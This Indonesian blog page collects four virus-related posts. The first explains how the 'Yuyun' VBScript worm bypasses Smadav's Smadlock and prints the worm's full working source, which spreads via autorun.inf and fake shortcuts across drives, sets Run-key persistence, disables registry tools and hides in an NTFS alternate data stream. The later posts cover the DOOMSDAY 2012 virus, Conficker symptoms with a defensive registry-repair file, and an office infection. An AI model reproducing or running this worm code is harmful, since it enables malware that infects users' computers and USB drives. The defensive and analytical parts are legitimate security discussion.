Tampilkan postingan dengan label VIRUS. Tampilkan semua postingan
Tampilkan postingan dengan label VIRUS. Tampilkan semua postingan

Virus Tembus Smad-lock

Sudah lama saya ga posting blog ini, sekarang bikin posting yang ga karuan lagi.
Postingan kali ini mungkin akan sama seperti postingan sebelumnya tentang Konsep Proteksi smadlock yang jadi pembicaraan di forum smadav. terus terang saya bukanlah anak smadaver, hanya pengguna antivirusnya saja.
Dalam Postingan sebelumnya saya buat karena melihat artikel di virologi dan jasakom, namun kali ini saya membuat postingan ini karena melihat di postingan virologi. Dalam artikel virologi dijabarkan bagaimana membuat virus visual basic yang dapat menembus smadlock.

Baik artikel di virologi maupun postingan ini semata-mata demi keamanan bersama menghadapi virus dan demi kemajuan taknologi antivirus dan virus indonesia. bahasanya gaya banget ya.. xixixi..
kebanyakan cingcong nih... langsung aja deh..[pikiran orang yang ga sabaran :)]

Apakah anda termasuk orang yang meremehkan virus vbs, mungkin saatnya anda jangan lagi meremehkan virus vbs yang ternyata mampu menembus smad-lock. Anda pasti mengenal virus Yuyun vbs atau Yuyun Cantik atau juga harry potter. Virus ini membuat banyak shourtcut pada setiap folder. Virus yang saya dapat dari av-soft.blogspot ini ternyata mampu menembus segitiga smadlock. Berikut gambarnya :




Ko bisa ya?? saya juga penasaran kenapa hal ini bisa terjadi.
Setelah saya sadar bahwa pada dasarnya smadlock adalah sebuah folder yang hanya direname dengan character unicode. Akan hal itu yuyun vbs mampu menembusnya dikarena pada script virus tersebut adalah mengcopy autorun.inf dan thumb.db pada semua folder yang ditemukan. Namun tidak terdapat shourtcut hal ini dikarena perbedaan perintah pada virus tersebut.
Untuk lebih jelasnya silahkan anda pelajari code script virus tersebut dibawah ini:
'=======================================================..' My name : Yuyun Ver 1.0..' I just wanna see every girl looks nice, better, kinds especially a moslem girl..' by: Anonymouse in Jatim, November 2008..' When I found nothing beauty else... and then I wrote this script for all..'=======================================================..On Error Resume Next..Dim fso, ws, status,status1, fly..Set fso = CreateObject("scripting.filesystemobject")..Set ws = CreateObject("wscript.Shell")..Set sh = CreateObject("Shell.application")..Set net = CreateObject("wscript.network")..fly=false..tmp=fso.GetSpecialFolder(2)..tn=fso.GetTempName..tmpt=tmp+"\"+tn..docx=ws.SpecialFolders("MyDocuments")....Set swt=WScript.Arguments..If swt.Count>0 Then...status=swt(0)..End If..if fso.fileexists(tmp+"\Yuyun.Q") then...set ira=fso.getfile(tmp+"\Yuyun.Q")...ira.attributes=0...ira.name="shalihah.ira"...if ira.name="shalihah.ira" then...ira.name="Yuyun.Q"...set ira=fso.opentextfile(tmp+"\Yuyun.Q",2,true)...else...fly=true...end if..else...set ira=fso.opentextfile(tmp+"\Yuyun.Q",2,true)..end if..Set AQ=fso.GetFile(status)..If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0..AQ.Copy tmpt,True..Set AQ=fso.GetFile(tmpt)..AQ.Attributes=39..anv=tmp+"\auto.exe"..If Not fso.FileExists(anv) Then AQ.Copy anv..Set auto=fso.GetFile(anv) ..auto.attributes=0....Set aut=fso.OpenTextFile(anv,2,True,0)..isi="[autorun]>open=WScript.exe //e:VBScript thumb.db auto>shell\open=Open>shell\open\Command=WScript.exe //e:VBScript thumb.db auto>shell\open\Default=1>shell\explore=Explore>shell\explore\Command=WScript.exe //e:VBScript thumb.db auto"..isi=Replace(isi,">",vbCrLf)..aut.Write isi..aut.Close..auto.Attributes=39....ltkc=sh.Namespace(&H1c&).Self.path + "\Microsoft\CD Burning"..AQ.Copy ltkc+"\thumb.db",True..auto.Copy ltkc+"\autorun.inf",True..If fso.FileExists(docx+"\database.mdb") Then fso.GetFile(docx+"\database.mdb").Attributes=0..AQ.Copy docx+"\database.mdb",True..regQ..Set rara=UNISKA..Hertz False..If Day(Now)<>3 Then rekursif docx,1 Else rekursif docx,3....call attack_net..Hertz True....Sub rekursif(path,dp)..On Error Resume Next..dropf path..wscript.sleep 50..If dp>0 Then..For Each fldr1 In fso.GetFolder(path+"\").SubFolders...rekursif fldr1.Path, dp-1..Next..End If..End Sub....Sub dropf(path)..On Error Resume Next..if day(now)=1 and (month(now)mod 3)=1 then ..rara.copy path+"\Baca AQ.rtf"..rara.copy path+"\My name is Yuyun.rtf"..end if....g1=path+"\autorun.inf"..g2=path+"\Thumb.db"..If fso.FileExists(g1) Then ...Set g11=fso.GetFile(g1) ...If g11.Attributes<>39 Then ....g11.Attributes=0....auto.Copy path+"\autorun.inf",True...end if..else ...auto.Copy path+"\autorun.inf",True..end if......If fso.FileExists(g2) Then ...Set g12=fso.GetFile(g2)...If g12.Attributes<>39 Then....g12.Attributes=0....AQ.Copy path+"\Thumb.db",True...end if..else...AQ.Copy path+"\Thumb.db",True..End If....If Not fso.FileExists(path+"\Microsoft.lnk") Then..shorZvnita path+"\Microsoft","Microsoft"..drop=Array("New Harry Potter and...","New Folder","SuratQ","Rahasia","Game","Zvnita","Download","DataQ","DataQ")..ww=1..For Each d In drop...If Day(now) Mod 3 = ww Then shorZvnita path+"\"+d,d...wscript.sleep 60...ww=ww+1..Next..r=0..For Each fldr In fso.GetFolder(path+"\").SubFolders...shorZvnita path+"\"+fldr.name,fldr.Name...wscript.sleep 60..If r>3 Then ...Exit For..End if..r=r+1..Next..End If..End Sub....Sub shorZvnita(path,trgt)..Set shor=ws.CreateShortcut(path+".lnk")..shor.iconlocation="shell32.dll,3"..shor.targetpath="wscript.exe"..shor.arguments="//e:VBScript thumb.db """+trgt+""""..shor.save..End Sub....function attack_net()...On Error Resume Next...err.clear...Set objFolder = sh.Namespace(&H13&)...Set colItems = objFolder.Items...For Each strFileName in objFolder.Items...t= objFolder.GetDetailsOf(strFileName, 14)...if fso.folderexists(t) then....rekursif t,4...end if...Next..End function....Sub tdr()..On Error Resume Next..err.clear..WScript.Sleep 180000..if err.number>0 then wscript.quit..End Sub....function UNISKA()..On error resume next..x=vbcrlf..adv="Yuyun Ver 1.0 ^_^!==================>>Bukan dari tulang ubun ia dicipta>karna berbahaya membiarkannya dalam sanjung dan puja>tak juga dari tulang kaki>karna nista membuatnya diinjak dan diperbudak>tapi dari tulang rusuk bagian kiri>dekat ke hati untuk disayangi>dekat ke tangan untuk dilindungi>>(dikutip dr: Agar Bidadari Cemburu Padamu)>>>""Janganlah kamu bersikap lemah, dan janganlah (pula) kamu bersedih hati, padahal kamulah>orang-orang yang paling tinggi (derajatnya), jika kamu orang-orang yang beriman."">(QS. Ali Imran:139)>>>Katakanlah kepada orang laki-laki yang beriman: ""Hendaklah mereka menahan pandanganya, >dan memelihara kemaluannya; yang demikian itu adalah lebih suci bagi mereka, >sesungguhnya Allah Maha Mengetahui apa yang mereka perbuat."" (QS. An Nur:30)>>Katakanlah kepada wanita yang beriman: ""Hendaklah mereka menahan pandangannya, >dan kemaluannya, dan janganlah mereka menampakkan perhiasannya, kecuali yang >(biasa) nampak dari padanya. Dan hendaklah mereka menutupkan kain kudung >kedadanya...."" (QS. An Nur:30)>>Sorry I just Nitip Print thok....Ndak pa2 khan^_^! www.muslimah.or.id >>Hai anak Adam, sesungguhnya Kami telah menurunkan kepadamu >pakaian untuk menutup auratmu dan pakaian indah untuk perhiasan.>Dan pakaian takwa itulah yang paling baik. Yang demikian itu adalah >sebahagian dari tanda-tanda kekuasaan Allah, mudah-mudahan mereka selalu ingat.(Al-A'raf:26)"....adv=replace(adv,">",x)..set Yu2n=fso.opentextfile(tmp+"\v.doc",2,true)..Yu2n.write adv..Yu2n.close..if day(now)=1 and (month(now)mod 3)=1 then ..if fly=false then..for i=1 to 3..ws.run "notepad.exe /p """+tmp+"\v.doc"""..next..end if..end if..set UNISKA=fso.getfile(tmp+"\v.doc")..end function....Sub regQ()..On Error Resume Next..if day(now)=1 then..ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\", "Yuyun_Cantix"..ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\DefaultIcon\","shell32.dll,48"..ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\ShellFolder\Attributes",0,"REG_DWORD"..ws.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{11111111-2222-3333-4444-555555555555}\",""..end if..ws.regdelete "HKCR\lnkfile\IsShortcut"..ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Explorer","Wscript.exe //e:VBScript """+docx+"\database.mdb"""..ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools",1,"REG_DWORD"..if lcase(fso.getdrive("c:").FileSystem)="ntfs" then..iraQ=AQ.openastextstream(1,0).read(AQ.size)..www=fso.GetSpecialFolder(0)..set jjk=fso.opentextfile(www+"\:Microsoft Office Update for Windows XP.sys",2,true)..jjk.write iraQ..jjk.close..ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdate","Wscript.exe //e:VBScript """+www+"\:Microsoft Office Update for Windows XP.sys"""..end if..End Sub....Sub Hertz(ooo)..On Error Resume Next..do..For Each drv In fso.Drives..If drv.DriveType=1 Then..rekursif drv.Path,4..Else..rekursif drv.Path,2..End if..Next..if fly=false then ..tdr..else ..wscript.quit..end if..regQ..If ooo=False Then ..Exit Do..End If..loop..End Sub

Untuk pengguna smadav dan menggunakan smadlock sebagai tameng pada flashdisk saya rasa masih aman digunakan karena setau saya masih belum ada virus yang dapat menginfeksi file yang ada dalam smadlock tersebut.
Namun selalulah berhati-hati terhadap file yang tidak anda kenal.
Salam damai selalu.. Maju dan Jaya terus Indonesia ku...

Read More!

DOOMSDAY 2012


Tahukah anda dengan DOOMSDAY 2012, jika anda pernah mampir ke nafarin.com anda pasti tahu akan hal ini. Sebuah virus yang dibuat oleh seorang pakar virus/ worm nomor 1 di Indonesia menciptakan virus yang memiliki cukup banyak tekhnik pertahanan yang digunakan.
Tak hanya menciptakan sebuah virus sang empu membuat sayembara dan menantang 3 antivirus lokal terbesar ( PCMAV, Ansav dan Smadav) untuk dapat memelakukan pembasmian terhadap nih virus.
Komentar pada blog sipembuat nih virus cukup ramai menghiasi blognya, baik dari 3 antivirus terbesar maupun dari pengunjung lainnya. Selain itu muncul pula sebuah antivirus baru menyatakan dirinya sebagai antivirus terbesar pula. Lihat disini

Jika anda penasaran akan virus tersebut cobalah anda klik disini.

Hal yang cukup aneh bagi saya jika ada sebuah posting virus yang menantang seperti itu, apakah maksud dari hal tersebut???
Menaikkan trafik blognya??? Ingin membuat virus yang lebih canggih lagi dengan melihat hasil analisa dari 3 antivirus lokal terbesar??? Ingin melihatkan pada VM lain dan menggunakan tekhnik virus tersebut agar lebih canggih??? atau ingin lebih lebih terkenal???(maaf bukan maksud apa2...). Virus ini melakukan hal yang hampir semuanya mirip dengan confikker yang melakukan bloking website dan menyebar melalui flashdisk maupun jaringan.

Meski Smadav telah mampu membasmi virus DOOMSDAY 2012 ini namun diragukan oleh pembuat ni virus. Lihat dibawah ini screenshot dari smadav dan empunya virus,:
Screenshot Pemilik Virus.

Screenshot Smadav.

Screenshot Smadav.

Saya sendiri sudah cukup puas dengan hasil antivirus yang terpasang pada komputer saya. berikut screenshotnya :

Dan ini adalah hasil analisa virscan.org meski tak semua antivirus mengenalinya. Tapi anda tak usah khawatir karena antivirus lokal telah dapat melakukan pembasmian meski virus lebih maju selangkah.
Read More!

Conficker / win32. downadup

Worm yang satu ini memang benar benar telah membuat kesal microsoft. Dalam hal mengatasi virus/ worm yang satu ini dibuat sangat spesial oleh microsoft. Pada saat ini microsoft membuat sayembara bagi siapapun yang berjasa dalam menangkap pelaku pembuat worm conficker ini. Microsoft dalam hal ini tidak tanggung tanggung memberikan hadiah US$ 250ribu atau sekitar 3 miliar bagi siapapun yang dapat menangkapnya atau mengungkap siapa pelakukanya.

Microsoft sendiri sebenarnya juga telah berusaha membendung penyebaran Conficker dengan menjalin kerjasama dengan beberapa organisasi dan perusahaan keamanan. Namun dengan digelarnya sayembara ini, sepertinya usaha Microsoft masih belum membuahkan hasil.

Conficker secara khusus memang menyasar ke pengguna sistem operasi Windows besutan Microsoft, mulai dari versi Windows XP Vista, hingga Windows 7 versi Beta. Layanan keamanan Windows menjadi tidak berfungsi, bahkan komputer yang ada dalam 1 jaringan juga bisa tertular.

Beberapa gejala komputer yang terinfeksi oleh confiker :
- Username Login di Active Directory (AD) Windows terkunci berulang-ulang. Jadi meskipun sudah terkunci (lock) dan dibuka oleh Admin, tetapi terkunci lagi.
Komputer mendapatkan pesan error Generic Host Process.

- Komputer tidak bisa mengakses situs-situs tertentu seperti www.microsoft.com, www.symantec.com, www.norman.com, www.clamav.com, www.grisoft.com, www.avast.com dan www.eset.com dengan pesan “Address not Found” tetapi jika situs-situs tersebut di akses dari alamat IPnya akan bisa diakses. Dan situs-situs lain tidak ada gangguan berarti.

- Update definisi antivirus terganggu karena akses ke situs antivirus diblok.

- Banyak aplikasi tidak berfungsi dengan baik. Khususnya aplikasi yang memanfaatkan jaringan dan menggunakan port 1024 s/d port 10.000

Selain itu conficker juga dapat melakukan beberapa kegiatan rutin yang cangih antara lain :
- Melumpuhkan System Restore
- Membuat HTTP Server
- Melakukan patch pada komputer korbannya
- Download File untuk update dirinya ke beberapa website yang telah disiapkan daftarnya (250 domain)

Benar benar dibuat istimewa virus yang satu ini, yang mampu mengalahkan beberapa worm sebelumnya seperti worm Sasser pada tahun 2004 dan blaster pada tahun 2003.

Untuk mengatasi virus/ worm ini silahkan anda klik disini.

atau dengan cara berikut :

Putuskan komputer yang akan dibersihkan dari jaringan/internet.

Matikan system restore (Windows XP / Vista).

Matikan proses virus yang aktif pada services. Gunakan removal tool dari Norman untuk membersihkan virus yang aktif.

Gunakan Norman Malware Cleaner untuk membersihkan virus yang aktif
http://download.norman.no/public/Norman_Malware_Cleaner.exe

Delete service svchost.exe gadungan yang ditanamkan virus pada regisrty. Anda dapat mencari secara manual pada registry


Hapus proses svchost.exe gadungan yang mengaktifkan virus

Hapus Schedule Task yang dibuat oleh virus. (C:\WINDOWS\Tasks)

Hapus string registry yang dibuat oleh virus. Untuk mempermudah dapat menggunakan script registry dibawah ini :

[Version]

Signature="$Chicago$"

Provider=Vaksincom Oyee



[DefaultInstall]

AddReg=UnhookRegKey

DelReg=del



[UnhookRegKey]

HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, Hidden, 0x00000001,1

HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, SuperHidden, 0x00000001,1

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL, CheckedValue, 0x00000001,1

HKLM, SYSTEM\CurrentControlSet\Services\BITS, Start, 0x00000002,2

HKLM, SYSTEM\CurrentControlSet\Services\ERSvc, Start, 0x00000002,2

HKLM, SYSTEM\CurrentControlSet\Services\wscsvc, Start, 0x00000002,2

HKLM, SYSTEM\CurrentControlSet\Services\wuauserv, Start, 0x00000002,2



[del]

HKCU, Software\Microsoft\Windows\CurrentVersion\Applets, dl

HKCU, Software\Microsoft\Windows\CurrentVersion\Applets, ds

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Applets, dl

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Applets, ds

HKLM, SYSTEM\CurrentControlSet\Services\Tcpip\Parameters, TcpNumConnections

Gunakan notepad, kemudian simpan dengan nama “repair.inf” (gunakan pilihan Save As Type menjadi All Files agar tidak terjadi kesalahan).

Jalankan repair.inf dengan klik kanan, kemudian pilih install.

Catatan : Untuk file yang aktif pada startup, anda dapat men-disable melalui “msconfig” atau dapat men-delete secara manual pada string :

“HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run”

Untuk pembersihan virus W32/Conficker.DV secara optimal dan mencegah infeksi ulang, sebaiknya menggunakan antivirus yang terupdate dan mampu mendeteksi virus ini dengan baik dan patch komputer anda dengan http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx guna mencegah infeksi ulang.

referensi artikel :
http://www.detikinet.com/
http://www.vaksin.com/
http://virologi.info/ Read More!

Virus Movie Maker

Kali ini saya ingin berbagi pengalaman tentang virus yang sedang menyerang komputer kantor. Sebenarnya saya masih ragu apakah ini sebuah virus atau bukan yang pasti telah membuat komputer kantor tak dapat menggunakan folder option. Ini baru sebagian kecil yang saya ketahui. Virus ini entah dari mana asalnya dan dengan cara apa penyebarannya. Sebelumnya komputer ini dipinjam oleh para mahasiswa yang sedang PKL (Praktek Kerja Lapangan) untuk melalukan pemaparan.

Bagaimana saya mengetahui adanya virus???

Saya selalu mengecek folder option setiap setelah komputer saya digunakan oleh orang lain, apalagi mereka menancapkan Flash Disk meraka. Saat itulah saya mengetahui bahwa adanya virus yang telah membuat folder option saya tak dapat digunakan.

Saya menggunakan hidden tools milik ebsoft.web.id, dengan menggunakan ini saya dapat mengetahui ada beberapa file yang tersembunyi yang pada awalnya file ini tidak ada. file tersebut adalah sebuah folder bernama movie maker yang bertempat di C:\programfile\ dan file berformat *.dll bernama netbfgj.dll bertempat di C:\windows\system32\. Dikarenakan Folder Option tak dapat digunakan saya terpaksa menggunakan Program hidden tools untuk membuat file - file tersebut tak tersembunyi lagi dan dapat saya lihat pada C:\programfile\ dan C:\windows\system32\. Setelah saya temui file - file tersebut, saya mencobanya untuk melihat isi didalamnya. Ternyata didalam folder ini terdapat sebuah file - file dan 2 (dua) folder yang tak tersembunyi.

Apa yang saya lakukan???

Karena ingin tahu saya coba menghapusnya, file - file tersebut dapat dihapus namun beberapa saat kemudian file - file tersebut muncul kembali.
Saya pikir mungkin dengan menghapus file netbfgj.dll yang terdapat pada C:\windows\system32\, folder movie maker beserta isi - isinya dapat saya hapus dan tak kembali muncul. Disaat saya mengkliknya antivirus AVG 8.0 yang saya miliki yang berlisensi sampai 2018 ini mendeteksi sebagai worm/downadup tetapi sayang tak dapat menghapusnya. Dan ketika saya menghapusnya sungguh mengejutkan file netbfgj.dll ini dapat saya hapus namun muncul dan berpindah ke tempat lain di C:\programfile\internet explorer\ dalam keadaan tersembunyi. Sedangkan Folder Movie maker beserta isi - isinya tetap tak dapat saya hapus.
Akhirnya saya coba kembali untuk menghapus file netbfgj.dll yang bertempat di C:\programfile\internet explorer\, file tersebut dapat saya hapus dan tiba tiba muncul peringatan dari AVG yang mendeteksi sampai 15 file dengan nama file yang sama. File ini saya dapat hapus namun muncul kembali di C:\windows\system32\.
Sepertinya virus ini tak menyebar melalui Flash disk atau USB karena pada saat saya menancapkan Flash disk dengan maksud agar virus itu masuk menyebar ke dalam Flash disk, virus tersebut tak ada dalam flash disk.
Entah ini merupakan varian dari virus downadup atau bukan yang pasti membuat saya tidak nyaman dan ingin membasmi virus ini.

Usaha apa yang akan saya lakukan untuk membasmi virus ini???

Tak ada cara lain selain mengupdate AVG yang saya miliki dan mencari antivirus lain yang dapat membasmi. Semoga saja dengan begitu virus ini dapat dibasmi. Sampai dengan tulisan ini saya buat virus ini masih menyerang komputer kantor. Bagi yang tahu bagaimana dan apa yang harus saya lakukan untuk membasmi virus ini, saya mohon dapat memberikan solusinya. Terimakasih..


File netbfgj.dll yang terletak di C:\proram file\Internet eksplorer\ Setelah dilakukan format agar tidak tersembunyi menggunakan program hidden tools.


program hidden tools yang mendeteksi adanya file tersembunyi pada disck C:\. file tersebut adalah netbfgj.dll yang sebelumnya ada dan awalnya terdapat di C:\windows\system32\


Isi folder Movie maker, namun saya telah menghapus 2 folder yang bernama profile dan sharede dimana isinya masing - masing memiliki sebuah notepad yang berformat *.txt.
Pada gambar tersebut saya pun telah melakukan rename pada moviemk.exe menjadi hh.exe namun beberapa saat kemudian muncul kembali file moviemk.exe.




AVG 8.0 yang telah mendeteksi virus ini, sebelumnya saya melakukan penghapusan pada file tersebut (netbfgj.dll).
Read More!